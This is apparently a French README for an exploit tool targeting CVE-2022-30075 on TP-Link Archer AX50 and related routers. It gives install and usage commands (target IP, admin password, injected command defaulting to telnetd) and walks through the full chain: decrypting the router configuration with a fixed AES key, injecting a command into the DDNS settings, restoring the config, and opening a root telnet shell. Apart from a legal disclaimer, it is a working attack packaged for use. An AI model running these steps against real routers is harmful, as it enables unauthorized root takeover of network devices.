
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) Cet outil exploite la vulnérabilité **CVE-2022-30075** présente sur le TP-Link Archer AX50 et certains autres modèles de routeurs TP-Link afin d'exécuter du code à distance avec authentification (Authenticated Remote Code Execution).
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075)
Cet outil utilise la vulnérabilité CVE-2022-30075 présente dans le TP-Link Archer AX50 et certains autres modèles de routeurs TP-Link pour effectuer une exécution de commande à distance authentifiée (Authenticated Remote Code Execution).
Cet outil utilise la vulnérabilité CVE-2022-30075 présente dans le TP-Link Archer AX50 et certains autres modèles de routeurs TP-Link pour effectuer une exécution de commande à distance authentifiée (Authenticated Remote Code Execution).
**L'UTILISATION DE CET OUTIL SUR DES SYSTÈMES NON AUTORISÉS EST UN CRIME **
- Utilisez-le uniquement sur des appareils dont vous êtes propriétaire ou pour lesquels vous avez une autorisation de test
- L'utilisation non autorisée est illégale et a des conséquences juridiques
- Assurez-vous que cela est conforme aux lois locales avant d'utiliser cet outil
- Les développeurs ne sont pas responsables des dommages résultant d'une mauvaise utilisation de cet outil
pip install requests pycryptodome
utilisation de base
python exploit.py -t 192.168.0.1 -p router_sifresi
utilisation avec commande personnalisée.
python exploit.py -t 192.168.0.1 -p router_sifresi -c "touch /tmp/exploit"
uniquement sauvegarder et déchiffrer
python exploit.py -t 192.168.0.1 -p router_sifresi -b
Uniquement restaurer le répertoire chiffré
python exploit.py -t 192.168.0.1 -p router_sifresi -r /path/to/decrypted_directory
-t | Adresse IP du routeur (obligatoire) -p | Mot de passe administrateur du routeur (obligatoire) -c | Commande à exécuter (par défaut: telnetd) -b | Uniquement sauvegarder et déchiffrer -r | Uniquement restaurer le répertoire chiffré
Authentification - Connexion au routeur avec le mot de passe administrateur Téléchargement de la configuration - Le fichier de configuration chiffré est récupéré depuis le routeur Déchiffrement - La configuration est déchiffrée en utilisant une clé AES fixe Injection de commande - La commande cible est ajoutée aux paramètres DDNS Chiffrement - La configuration modifiée est à nouveau chiffrée Restauration - La fausse configuration est chargée sur le routeur Accès - Après le redémarrage du routeur, connexion au shell root via telnet
Quelques minutes après le redémarrage du routeur :
telnet 192.168.0.1
vous pouvez accéder au shell root avec cette commande